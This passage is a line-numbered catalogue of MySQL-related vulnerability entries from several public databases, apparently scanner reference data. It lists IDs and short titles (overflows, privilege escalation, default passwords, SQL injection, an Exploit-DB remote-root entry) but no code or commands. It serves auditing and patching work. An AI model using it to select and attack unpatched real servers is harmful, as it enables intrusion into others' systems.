14591| [45042] MySQL empty bit-string literal denial of service
14592| [44662] mysql-lists unspecified cross-site scripting
14593| [42267] MySQL MyISAM security bypass
14594| [42211] GEDCOM_to_MySQL2 index.php, info.php and prenom.php cross-site scripting
14595| [42014] miniBB setup_mysql.php and setup_options.php SQL injection
14596| [40920] MySQL sql_select.cc denial of service
14597| [40734] MySQL Server BINLOG privilege escalation
14598| [40350] MySQL password information disclosure
14599| [39415] Debian GNU/Linux libdspam7-drv-mysql cron job password disclosure
14600| [39402] PHP LOCAL INFILE and MySQL extension security bypass
14601| [38999] aurora framework db_mysql.lib SQL injection
14602| [38990] MySQL federated engine denial of service
14603| [38989] MySQL DEFINER value privilege escalation
14604| [38988] MySQL DATA DIRECTORY and INDEX DIRECTORY privilege escalation
14605| [38964] MySQL RENAME TABLE symlink
14606| [38733] ManageEngine EventLog Analyzer MySQL default password
14607| [38284] MySQL ha_innodb.cc convert_search_mode_to_innobase() denial of service
14608| [38189] MySQL default root password
14609| [37235] Asterisk-Addons cdr_addon_mysql module SQL injection
14610| [37099] RHSA update for MySQL case sensistive database name privilege escalation not installed
14611| [36555] PHP MySQL extension multiple functions security bypass
14612| [35960] MySQL view privilege escalation
14613| [35959] MySQL CREATE TABLE LIKE information disclosure
14614| [35958] MySQL connection protocol denial of service
14615| [35291] MySQLDumper main.php security bypass
14616| [34811] MySQL udf_init and mysql_create_function command execution
14617| [34809] MySQL mysql_update privilege escalation
14618| [34349] MySQL ALTER information disclosure
14619| [34348] MySQL mysql_change_db privilege escalation
14620| [34347] MySQL RENAME TABLE weak security
14621| [34232] MySQL IF clause denial of service
14622| [33388] Advanced Website Creator (AWC) mysql_escape_string SQL injection
14623| [33285] Eve-Nuke mysql.php file include
14624| [32957] MySQL Commander dbopen.php file include
14625| [32933] cPanel load_language.php and mysqlconfig.php file include
14626| [32911] MySQL filesort function denial of service
14627| [32462] cPanel passwdmysql cross-site scripting
14628| [32288] RHSA-2006:0544 updates for mysql not installed
14629| [32266] MySQLNewsEngine affichearticles.php3 file include
14630| [31244] The Address Book MySQL export.php password information disclosure
14631| [31037] Php/Mysql Site Builder (PHPBuilder) htm2php.php directory traversal
14632| [30760] BTSaveMySql URL file disclosure
14633| [30191] StoryStream mysql.php and mysqli.php file include
14634| [30085] MySQL MS-DOS device name denial of service
14635| [30031] Agora MysqlfinderAdmin.php file include
14636| [29438] MySQLDumper mysqldumper_path/sql.php cross-site scripting
14637| [29179] paBugs class.mysql.php file include
14638| [29120] ZoomStats MySQL file include
14639| [28448] MySQL case sensitive database name privilege escalation
14640| [28442] MySQL GRANT EXECUTE privilege escalation
14641| [28387] FunkBoard admin/mysql_install.php and admin/pg_install.php unauthorized access
14642| [28202] MySQL multiupdate subselect query denial of service
14643| [28180] MySQL MERGE table security bypass
14644| [28176] PHP MySQL Banner Exchange lib.inc information disclosure
14645| [27995] Opsware Network Automation System MySQL plaintext password
14646| [27904] MySQL date_format() format string
14647| [27635] MySQL Instance Manager denial of service
14648| [27212] MySQL SELECT str_to_date denial of service
14649| [26875] MySQL ASCII escaping SQL injection
14650| [26420] Apple Mac OS X MySQL Manager blank password
14651| [26236] MySQL login packet information disclosure
14652| [26232] MySQL COM_TABLE_DUMP buffer overflow
14653| [26228] MySQL sql_parce.cc information disclosure
14654| [26042] MySQL running
14655| [25313] WoltLab Burning Board class_db_mysql.php cross-site scripting
14656| [24966] MySQL mysql_real_query logging bypass
14657| [24653] PAM-MySQL logging function denial of service
14658| [24652] PAM-MySQL authentication double free code execution
14659| [24567] PHP/MYSQL Timesheet index.php and changehrs.php SQL injection
14660| [24095] PHP ext/mysqli exception handling format string
14661| [23990] PHP mysql_connect() buffer overflow
14662| [23596] MySQL Auction search module could allow cross-site scripting
14663| [22642] RHSA-2005:334 updates for mysql not installed
14664| [21757] MySQL UDF library functions command execution
14665| [21756] MySQL LoadLibraryEx function denial of service
14666| [21738] MySQL UDF mysql_create_function function directory traversal
14667| [21737] MySQL user defined function buffer overflow
14668| [21640] MySQL Eventum multiple class SQL injection
14669| [21638] MySQL Eventum multiple scripts cross-site scripting
14670| [20984] xmysqladmin temporary file symlink
14671| [20656] MySQL mysql_install_db script symlink
14672| [20333] Plans MySQL password information disclosure
14673| [19659] MySQL CREATE TEMPORARY TABLE command creates insecure files
14674| [19658] MySQL udf_init function gain access
14675| [19576] auraCMS mysql_fetch_row function path disclosure
14676| [18922] MySQL mysqlaccess script symlink attack
14677| [18824] MySQL UDF root privileges
14678| [18464] mysql_auth unspecified vulnerability
14679| [18449] Sugar Sales plaintext MySQL password
14680| [17783] MySQL underscore allows elevated privileges
14681| [17768] MySQL MATCH ... AGAINST SQL statement denial of service
14682| [17667] MySQL UNION change denial of service
14683| [17666] MySQL ALTER TABLE RENAME bypass restriction
14684| [17493] MySQL libmysqlclient bulk inserts buffer overflow
14685| [17462] MySQLGuest AWSguest.php script cross-site scripting
14686| [17047] MySQL mysql_real_connect buffer overflow
14687| [17030] MySQL mysqlhotcopy insecure temporary file
14688| [16612] MySQL my_rnd buffer overflow
14689| [16604] MySQL check_scramble_323 function allows unauthorized access
14690| [15883] MySQL mysqld_multi script symlink attack
14691| [15617] MySQL mysqlbug script symlink attack
14692| [15417] Confixx db_mysql_loeschen2.php SQL injection
14693| [15280] Proofpoint Protection Server MySQL allows unauthorized access
14694| [13404] HP Servicecontrol Manager multiple vulnerabilities in MySQL could allow execution of code
14695| [13153] MySQL long password buffer overflow
14696| [12689] MySQL AB ODBC Driver stores ODBC passwords and usernames in plain text
14697| [12540] Teapop PostSQL and MySQL modules SQL injection
14698| [12337] MySQL mysql_real_connect function buffer overflow
14699| [11510] MySQL datadir/my.cnf modification could allow root privileges
14700| [11493] mysqlcc configuration and connection files are world writable
14701| [11340] SuckBot mod_mysql_logger denial of service
14702| [11199] MySQL mysql_change_user() double-free memory pointer denial of service
14703| [10850] MySQL libmysql client read_one_row buffer overflow
14704| [10849] MySQL libmysql client read_rows buffer overflow
14705| [10848] MySQL COM_CHANGE_USER password buffer overflow
14706| [10847] MySQL COM_CHANGE_USER command password authentication bypass
14707| [10846] MySQL COM_TABLE_DUMP unsigned integer denial of service
14708| [10483] Bugzilla stores passwords in plain text in the MySQL database
14709| [10455] gBook MySQL could allow administrative access
14710| [10243] MySQL my.ini "
14711| [9996] MySQL SHOW GRANTS command discloses adminstrator`s encrypted password
14712| [9909] MySQL logging disabled by default on Windows
14713| [9908] MySQL binding to the loopback adapter is disabled
14714| [9902] MySQL default root password could allow unauthorized access
14715| [8748] Cyrus SASL LDAP+MySQL patch allows user unauthorized POP access
14716| [8105] PHP MySQL client library allows an attacker to bypass safe_mode restrictions
14717| [7923] Conectiva Linux MySQL /var/log/mysql file has insecure permissions
14718| [7206] WinMySQLadmin stores MySQL password in plain text
14719| [6617] MySQL "
14720| [6419] MySQL drop database command buffer overflow
14721| [6418] MySQL libmysqlclient.so buffer overflow
14722| [5969] MySQL select buffer overflow
14723| [5447] pam_mysql authentication input
14724| [5409] MySQL authentication algorithm obtain password hash
14725| [5057] PCCS MySQL Database Admin Tool could reveal username and password
14726| [4228] MySQL unauthenticated remote access
14727| [3849] MySQL default test account could allow any user to connect to the database
14728| [1568] MySQL creates readable log files
14729|
14730| Exploit-DB - https://www.exploit-db.com:
14731| [30744] MySQL <= 5.1.23 Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability
14732| [23073] MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)
14733| [15467] Oracle MySQL < 5.1.49 'WITH ROLLUP' Denial of Service Vulnerability
14734|
14735| OpenVAS (Nessus) - http://www.openvas.org:
14736| [53251] Debian Security Advisory DSA 562-1 (mysql)
14737| [53230] Debian Security Advisory DSA 540-1 (mysql)
14738|
14739| SecurityTracker - https://www.securitytracker.com:
14740| [1028790] MySQL Multiple Bugs Let Remote Users Deny Service and Partially Access and Modify Data
14741| [1028449] MySQL Multiple Bugs Let Remote Authenticated Users Deny Service and Partially Access and Modify Data
14742| [1028004] MySQL Multiple Bugs Let Remote Authenticated Users Take Full Control or Deny Service and Let Local Users Access and Modify Data
14743| [1027829] MySQL Bug in UpdateXML() Lets Remote Authenticated Users Deny Service
14744| [1027828] MySQL Heap Overflow May Let Remote Authenticated Users Execute Arbitrary Code
14745| [1027827] MySQL Stack Overflow May Let Remote Authenticated Users Execute Arbitrary Code
14746| [1027665] MySQL Multiple Bugs Let Remote Authenticated Users Access and Modify Data and Deny Service and Local Users Access Data
14747| [1027263] MySQL Multiple Bugs Let Remote Authenticated Users Deny Service
14748| [1027143] MySQL memcmp() Comparison Error Lets Remote Users Bypass Authentication
14749| [1026934] MySQL Multiple Bugs Let Remote Users Deny Service
14750| [1026896] MySQL Unspecified Flaws Have Unspecified Impact
14751| [1026659] MySQL Unspecified Flaw Lets Remote Users Execute Arbitrary Code
14752| [1026530] MySQL Multiple Bugs Let Local and Remote Users Partially Access and Modifiy Data and Partially Deny Service
14753| [1024508] MySQL Replication Flaw Lets Remote Authenticated Users Gain Elevated Privileges
14754| [1024507] MySQL Multiple Flaws Let Remote Authenticated Users Deny Service
14755| [1024360] MySQL Multiple Flaws Let Remote Authenticated Users Deny Service
14756| [1024160] MySQL ALTER DATABASE Processing Error Lets Remote Authenticated Users Deny Service
14757| [1024033] MySQL COM_FIELD_LIST Packet Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code
14758| [1024032] MySQL Large Packet Processing Flaw in my_net_skip_rest() Lets Remote Users Deny Service
14759| [1024031] MySQL COM_FIELD_LIST Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
14760| [1024004] MySQL mi_delete_table() Symlink Flaw Lets Remote Authenticated Users Delete Data and Index Files
14761| [1023402] MySQL Unspecified Flaw Lets Remote Users Execute Arbitrary Code
14762| [1023220] MySQL Client Fails to Check Server Certificates in Certain Cases
14763| [1022812] MySQL Unspecified Buffer Overflow Lets Remote Users Execute Arbitrary Code
14764| [1022533] MySQL Format String Bug in dispatch_command() Lets Remote Users Deny Service
14765| [1022482] MySQL Connector/Net is Missing SSL Certificate Validation
14766| [1021786] MySQL Bug in ExtractValue()/UpdateXML() in Processing XPath Expressions Lets Remote Authenticated Users Deny Service
14767| [1021714] (Red Hat Issues Fix) mod_auth_mysql Input Validation Flaw Lets Remote Users Inject SQL Commands
14768| [1020858] MySQL Item_bin_string::Item_bin_string() Binary Value Processing Bug Lets Remote Authenticated Users Deny Service
14769| [1019995] MySQL MyISAM Options Let Local Users Overwrite Table Files
14770| [1019085] MySQL Bugs Let Remote Authenticated Users Gain Elevated Privileges and Deny Service
14771| [1019084] MySQL DATA DIRECTORY and INDEX DIRECTORY Options May Let Remote Authenticated Users Gain Elevated Privileges
14772| [1019083] MySQL BINLOG Filename Path Bug May Let Remote Authenticated Users Gain Elevated Privileges
14773| [1019060] MySQL Rename Table Bug Lets Remote Authenticated Users Modify System Table Information
14774| [1018978] MySQL convert_search_mode_to_innobase() Bug Lets Remote Authenticated Users Deny Service
14775| [1018824] Asterisk-Addons Input Validation Flaw in cdr_addon_mysql Lets Remote Users Inject SQL Commands
14776| [1018663] MySQL Table View Access Bug Lets Remote Authenticated Users Gain Elevated Privileges
14777| [1018629] MySQL Authentication Protocol Bug Lets Remote Users Deny Service
14778| [1018071] MySQL ALTER TABLE Function Lets Remote Authenticated Users Obtain Potentially Sensitive Information
14779| [1018070] MySQL SQL SECURITY INVOKER Routines Let Remote Authenticated Users Gain Elevated Privileges
14780| [1018069] MySQL Lets Remote Authenticated Users Issue the RENAME TABLE Command
14781| [1017746] MySQL Single Row Subselect Statements Let Remote Users Deny Service
14782| [1016790] MySQL Replication Error Lets Local Users Deny Service
14783| [1016710] MySQL Case-Sensitive Database Names May Let Users Access Restricted Databases
14784| [1016709] MySQL Error in Checking suid Routine Arguments May Let Users Gain Elevated Privileges
14785| [1016617] MySQL MERGE Access Control Error May Let Users Access a Restricted Table
14786| [1016566] Opsware Network Automation System Discloses MySQL Password to Local Users
14787| [1016216] MySQL Error in Parsing Multibyte Encoded Data in mysql_real_escape() Lets Remote Users Inject SQL Commands
14788| [1016077] Apple MySQL Manager Database Initialization Bug May Let Local Users Access the Database
14789| [1016017] MySQL Anonymous Login Processing May Disclose Some Memory Contents to Remote Users
14790| [1016016] MySQL COM_TABLE_DUMP Processing Lets Remote Authenticated Users Execute Arbitrary Code or Obtain Information
14791| [1015789] Woltlab Burning Board Input Validation Hole in 'class_db_mysql.php' Permits Cross-Site Scripting Attacks
14792| [1015693] MySQL Query Bug Lets Remote Users Bypass Query Logging
14793| [1015603] PAM-MySQL pam_get_item() Double Free May Let Remote Users Execute Arbitrary Code
14794| [1015485] PHP mysqli Extension Error Mode Format String Flaw May Let Users Execute Arbitrary Code
14795| [1014603] MySQL Eventum Input Validation Hole in 'class.auth.php' Permits SQL Injection and Other Input Validation Bugs Permit Cross-Site Scripting Attacks
14796| [1014172] xMySQLadmin Lets Local Users Delete Files
14797| [1013995] MySQL 'mysql_install_db' Uses Unsafe Temporary Files and May Let Local Users Gain Elevated Privilege
14798| [1013994] MySQL Non-existent '--user' Error May Allow the Database to Run With Incorrect Privileges
14799| [1013415] MySQL CREATE FUNCTION Lets Authenticated Users Invoke libc Functions to Execute Arbitrary Code
14800| [1013414] MySQL udf_init() Path Validation Flaw Lets Authenticated Users Execute Arbitrary Libraries
14801| [1013413] MySQL CREATE TEMPORARY TABLE Uses Predictable Temporary Files That May Let Users Gain Elevated Privileges
14802| [1012914] MySQL 'mysqlaccess.sh' Unsafe Temporary Files May Let Local Users Gain Elevated Privileges
14803| [1012893] MySQL MaxDB Buffer Overflow in websql Password Parameter Lets Remote Users Execute Arbitrary Code
14804| [1012500] mysql_auth Memory Leak Has Unspecified Impact
14805| [1011741] MySQL Access Control Error in Databases With Underscore Wildcard Character May Grant Unauthorized Access
14806| [1011606] MySQL May Let Remote Authenticated Users Access Restricted Tables or Crash the System
14807| [1011408] MySQL libmysqlclient Buffer Overflow in Executing Prepared Statements Has Unspecified Impact
14808| [1011376] MySQLGuest Lack of Input Validation Lets Remote Users Conduct Cross-Site Scripting Attacks
14809| [1011008] MySQL Buffer Overflow in mysql_real_connect() May Let Remote Users Execute Arbitrary Code
14810| [1010979] MySQL 'mysqlhotcopy' Unsafe Temporary Files May Let Local Users Gain Elevated Privileges
14811| [1010645] MySQL check_scramble_323() Zero-Length Comparison Lets Remote Users Bypass Authentication
14812| [1009784] MySQL 'mysqld_multi' Temporary File Flaw Lets Local Users Overwrite Files
14813| [1009554] MySQL 'mysqlbug' Temporary File Flaw Lets Local Users Overwrite Files
14814| [1007979] MySQL mysql_change_user() Double Free Error Lets Remote Authenticated Users Crash mysqld
14815| [1007673] MySQL acl_init() Buffer Overflow Permits Remote Authenticated Administrators to Execute Arbitrary Code
14816| [1007518] DWebPro Discloses MySQL Database Password to Local Users
14817| [1007312] MySQL World-Writable Configuration File May Let Local Users Gain Root Privileges
14818| [1006976] MySQL Buffer Overflow in 'mysql_real_connect()' Client Function May Let Remote or Local Users Execute Arbitrary Code
14819| [1005800] MySQL Overflow and Authentication Bugs May Let Remote Users Execute Code or Access Database Accounts
14820| [1005345] MySQL Buffer Overflow Lets Local Users Gain System Privileges on Windows NT
14821| [1004506] vBulletin PHP-based Forum Software Has Unspecified Security Flaw in the 'db_mysql.php' Module
14822| [1004172] PHP-Survey Script Discloses Underlying MySQL Database Username and Password to Remote Users
14823| [1003955] 3rd Party Patch for Cyrus SASL ('auxprop for mysql and ldap') Lets Remote Users Access Protected POP Mail Accounts Without Authentication
14824| [1003290] Conectiva Linux MySQL Distribution May Allow Local Users to Obtain Sensitive Information
14825| [1002993] PurePostPro Script Add-on for PureFTPd and MySQL Allows Remote Users to Execute SQL Commands on the Server
14826| [1002485] WinMySQLadmin Database Administration Tool Discloses MySQL Password to Local Users
14827| [1002324] Vpopmail Mail Server Discloses Database Password to Local Users When Installed with MySQL
14828| [1001411] phpMyAdmin Administration Tool for MySQL Allows Remote Users to Execute Commands on the Server
14829| [1001118] MySQL Database Allows Authorized Users to Modify Server Files to Deny Service or Obtain Additional Access
14830|
14831| OSVDB - http://www.osvdb.org:
14832| [95337] Oracle MySQL Server XA Transactions Subcomponent Unspecified Remote DoS
14833| [95336] Oracle MySQL Server Replication Subcomponent Unspecified Remote DoS
14834| [95335] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
14835| [95334] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue
14836| [95333] Oracle MySQL Server Partition Subcomponent Unspecified Remote DoS
14837| [95332] Oracle MySQL Server Parser Subcomponent Unspecified Remote DoS
14838| [95331] Oracle MySQL Server Options Subcomponent Unspecified Remote DoS (2013-3801)
14839| [95330] Oracle MySQL Server Options Subcomponent Unspecified Remote DoS (2013-3808)
14840| [95329] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2013-3796)
14841| [95328] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2013-3804)
14842| [95327] Oracle MySQL Server Prepared Statements Subcomponent Unspecified Remote DoS
14843| [95326] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
14844| [95325] Oracle MySQL Server Full Text Search Subcomponent Unspecified Remote DoS
14845| [95324] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-3795)
14846| [95323] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-3793)
14847| [95322] Oracle MySQL Server Audit Log Subcomponent Unspecified Remote Issue
14848| [95321] Oracle MySQL Server MemCached Subcomponent Unspecified Remote Issue
14849| [95131] AutoMySQLBackup /usr/sbin/automysqlbackup Database Name Arbitrary Code Injection
14850| [94076] Debian Linux MySQL Server mysql-server-5.5.postinst Race Condition debian.cnf Plaintext Credential Local Disclosure
14851| [93505] Wireshark MySQL Dissector (packet-mysql.c) Malformed Packet Handling Infinite Loop Remote DoS
14852| [93174] MySQL Crafted Derived Table Handling DoS
14853| [92967] MySQL2JSON (mn_mysql2json) Extension for TYPO3 Unspecified SQL Injection
14854| [92950] MySQL Running START SLAVE Statement Process Listing Plaintext Local Password Disclosure
14855| [92485] Oracle MySQL Server Partition Subcomponent Unspecified Local DoS
14856| [92484] Oracle MySQL Server Locking Subcomponent Unspecified Remote DoS (2013-1506)
14857| [92483] Oracle MySQL Server Install Subcomponent Unspecified Local Issue
14858| [92482] Oracle MySQL Server Types Subcomponent Unspecified Remote DoS
14859| [92481] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-2381)
14860| [92480] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-1566)
14861| [92479] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-1511)
14862| [92478] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1567)
14863| [92477] Oracle MySQL Server Stored Procedure Subcomponent Unspecified Remote DoS
14864| [92476] Oracle MySQL Server Replication Subcomponent Unspecified Remote DoS
14865| [92475] Oracle MySQL Server Partition Subcomponent Unspecified Remote DoS
14866| [92474] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS
14867| [92473] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-2389)
14868| [92472] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote DoS
14869| [92471] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1512)
14870| [92470] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1544)
14871| [92469] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote Issue
14872| [92468] Oracle MySQL Server MemCached Subcomponent Unspecified Remote DoS
14873| [92467] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-2375)
14874| [92466] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-1531)
14875| [92465] Oracle MySQL Server Server Subcomponent Unspecified Remote Issue
14876| [92464] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote Issue
14877| [92463] Oracle MySQL Server Locking Subcomponent Unspecified Remote Issue (2013-1521)
14878| [92462] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-2395)
14879| [91536] Oracle MySQL yaSSL Unspecified Overflow (2012-0553)
14880| [91534] Oracle MySQL yaSSL Unspecified Overflow (2013-1492)
14881| [91415] MySQL Raw Geometry Object String Conversion Remote DoS
14882| [91108] Juju mysql Charm Install Script mysql.passwd MySQL Password Plaintext Local Disclosure
14883| [89970] Site Go /site-go/admin/extra/mysql/index.php idm Parameter Traversal Arbitrary File Access
14884| [89265] Oracle MySQL Server Server Privileges Subcomponent Unspecified Remote DoS
14885| [89264] Oracle MySQL Server Server Partition Subcomponent Unspecified Remote DoS
14886| [89263] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-0578)
14887| [89262] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-1705)
14888| [89261] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-0574)
14889| [89260] Oracle MySQL Server MyISAM Subcomponent Unspecified Remote DoS
14890| [89259] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2012-0572)
14891| [89258] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-0368)
14892| [89257] Oracle MySQL Server Server Locking Subcomponent Unspecified Remote DoS
14893| [89256] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-1702)
14894| [89255] Oracle MySQL Server Server Replication Subcomponent Unspecified Remote Issue
14895| [89254] Oracle MySQL Server Server Replication Subcomponent Unspecified Local Issue
14896| [89253] Oracle MySQL Server Stored Procedure Subcomponent Unspecified Remote DoS
14897| [89252] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS
14898| [89251] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote DoS
14899| [89250] Oracle MySQL Server GIS Extension Subcomponent Unspecified Remote DoS
14900| [89042] ViciBox Server MySQL cron Service Default Credentials
14901| [88415] Oracle MySQL Server COM_CHANGE_USER Account Password Brute-Force Weakness
14902| [88118] Oracle MySQL Server FILE Privilege Database Privilege Escalation
14903| [88067] Oracle MySQL Server Authentication Error Message User Enumeration
14904| [88066] Oracle MySQL Server for Linux Access Rights Checking Routine Database Name Handling Stack Buffer Overflow
14905| [88065] Oracle MySQL Server COM_BINLOG_DUMP Invalid Data Handling DoS
14906| [88064] Oracle MySQL Server Multiple-Table DELETE Heap Buffer Overflow
14907| [87704] CodeIgniter MySQL / MySQLi Driver Database Client Multi-byte Character Set Unspecified SQL Injection
14908| [87507] Oracle MySQL Statement Logging Multiple Log Plaintext Local Password Disclosure
14909| [87501] Oracle MySQL optimizer_switch Malformed Value Processing Local DoS
14910| [87494] Oracle MySQL on Windows Field_new_decimal::store_value dbug_buff Variable Overflow DoS
14911| [87480] MySQL Malformed XML Comment Handling DoS
14912| [87466] MySQL SSL Certificate Revocation Weakness
14913| [87356] Oracle MySQL do_div_mod DIV Expression Handling Remote DoS
14914| [87355] Oracle MySQL handler::pushed_cond Table Cache Handling mysqld DoS
14915| [87354] Oracle MySQL Polygon Union / Intersection Spatial Operations DoS
14916| [86273] Oracle MySQL Server Server Installation Subcomponent Unspecified Local Information Disclosure
14917| [86272] Oracle MySQL Server Server Replication Subcomponent Unspecified Remote DoS
14918| [86271] Oracle MySQL Server Server Full Text Search Subcomponent Unspecified Remote DoS
14919| [86270] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3156)
14920| [86269] Oracle MySQL Server MySQL Client Subcomponent Unspecified Remote Information Disclosure
14921| [86268] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-3180)
14922| [86267] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-3150)
14923| [86266] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3144)
14924| [86265] Oracle MySQL Server InnoDB Plugin Subcomponent Unspecified Remote DoS
14925| [86264] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
14926| [86263] Oracle MySQL Server MySQL Client Subcomponent Unspecified Remote Issue
14927| [86262] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3177)
14928| [86261] Oracle MySQL Server Protocol Subcomponent Unspecified Remote Issue
14929| [86260] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote Code Execution
14930| [86175] Oracle MySQL on Windows Path Subversion Arbitrary DLL Injection Code Execution
14931| [85155] Icinga module/idoutils/db/scripts/create_mysqldb.sh Icinga User Database Access Restriction Bypass
14932| [84755] Oracle MySQL Sort Order Index Calculation Remote DoS
14933| [84719] MySQLDumper index.php page Parameter XSS
14934| [84680] MySQL Squid Access Report access.log File Path XSS
14935| [83980] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1689)
14936| [83979] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1734)
14937| [83978] Oracle MySQL Server Subcomponent Unspecified Remote DoS
14938| [83977] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
14939| [83976] Oracle MySQL Server GIS Extension Subcomponent Unspecified Remote DoS
14940| [83975] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1735)
14941| [83661] Oracle MySQL Unspecified Issue (59533)
14942| [82804] Oracle MySQL Authentication Protocol Token Comparison Casting Failure Password Bypass
14943| [82803] Oracle MySQL Unspecified Issue (59387)
14944| [82120] Oracle MySQL Version Specific Comment Handling Arbitrary SQL Command Execution
14945| [81897] Viscacha classes/database/mysql.inc.php Multiple Parameter SQL Injection
14946| [81616] MySQLDumper Multiple Script Direct Request Information Disclosure
14947| [81615] MySQLDumper filemanagement.php f Parameter Traversal Arbitrary File Access
14948| [81614] MySQLDumper File Upload PHP Code Execution
14949| [81613] MySQLDumper main.php Multiple Function CSRF
14950| [81612] MySQLDumper restore.php filename Parameter XSS
14951| [81611] MySQLDumper sql.php Multiple Parameter XSS
14952| [81610] MySQLDumper install.php Multiple Parameter XSS
14953| [81609] MySQLDumper install.php language Parameter Traversal Arbitrary File Access
14954| [81378] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1690)
14955| [81377] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1696)
14956| [81376] Oracle MySQL Server Server DML Component Unspecified Remote DoS
14957| [81375] Oracle MySQL Server Partition Component Unspecified Remote DoS
14958| [81374] Oracle MySQL Server MyISAM Component Unspecified Remote DoS
14959| [81373] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1703)
14960| [81059] Oracle MySQL Server Multiple Unspecified Issues
14961| [79038] Webmin Process Listing MySQL Password Local Disclosure
14962| [78919] Oracle MySQL Unspecified Pre-authentication Remote Code Execution
14963| [78710] WordPress wp-admin/setup-config.php MySQL Query Saturation Brute-Force Proxy Weakness
14964| [78708] WordPress wp-admin/setup-config.php MySQL Database Verification Code Injection Weakness
14965| [78707] WordPress wp-admin/setup-config.php MySQL Credentials Error Message Brute-Force Weakness
14966| [78394] Oracle MySQL Server Unspecified Remote DoS (2012-0493)
14967| [78393] Oracle MySQL Server Unspecified Remote DoS (2012-0492)
14968| [78392] Oracle MySQL Server Unspecified Remote DoS (2012-0117)
14969| [78391] Oracle MySQL Server Unspecified Remote DoS (2012-0112)
14970| [78390] Oracle MySQL Server Unspecified Remote DoS (2012-0495)
14971| [78389] Oracle MySQL Server Unspecified Remote DoS (2012-0491)
14972| [78388] Oracle MySQL Server Unspecified Remote DoS (2012-0490)
14973| [78387] Oracle MySQL Server Unspecified Remote DoS (2012-0489)
14974| [78386] Oracle MySQL Server Unspecified Remote DoS (2012-0488)
14975| [78385] Oracle MySQL Server Unspecified Remote DoS (2012-0487)
14976| [78384] Oracle MySQL Server Unspecified Remote DoS (2012-0486)
14977| [78383] Oracle MySQL Server Unspecified Remote DoS (2012-0485)
14978| [78382] Oracle MySQL Server Unspecified Remote DoS (2012-0120)
14979| [78381] Oracle MySQL Server Unspecified Remote DoS (2012-0119)
14980| [78380] Oracle MySQL Server Unspecified Remote DoS (2012-0115)
14981| [78379] Oracle MySQL Server Unspecified Remote DoS (2012-0102)
14982| [78378] Oracle MySQL Server Unspecified Remote DoS (2012-0101)
14983| [78377] Oracle MySQL Server Unspecified Remote DoS (2012-0087)
14984| [78376] Oracle MySQL Server Unspecified Remote DoS (2011-2262)
14985| [78375] Oracle MySQL Server Unspecified Local DoS
14986| [78374] Oracle MySQL Server Unspecified Remote Issue (2012-0075)
14987| [78373] Oracle MySQL Server Unspecified Local Issue
14988| [78372] Oracle MySQL Server Unspecified Remote Information Disclosure
14989| [78371] Oracle MySQL Server Unspecified Remote Issue (2012-0496)
14990| [78370] Oracle MySQL Server Unspecified Remote Issue (2012-0118)
14991| [78369] Oracle MySQL Server Unspecified Remote Issue (2012-0116)
14992| [78368] Oracle MySQL Server Unspecified Remote Issue (2012-0113)
14993| [78283] Oracle MySQL NULL Pointer Dereference Packet Parsing Remote DoS
14994| [77042] e107 CMS install_.php MySQL Server Name Parsing Remote PHP Code Execution
14995| [77040] DBD::mysqlPP Unspecified SQL Injection
14996| [75888] TaskFreak! multi-mysql Multiple Script Direct Request Path Disclosure
14997| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
14998| [73555] Prosody MySQL Value Column Invalid Data Type Handling DoS
14999| [73387] Zend Framework PDO_MySql Character Set Security Bypass
15000| [72836] Arctic Fox CMS Multiple Script Direct Request MySQL Settings Disclosure
15001| [72660] MySQL GUI Tools Administrator / Query Browser Command Line Credentials Local Disclosure
15002| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
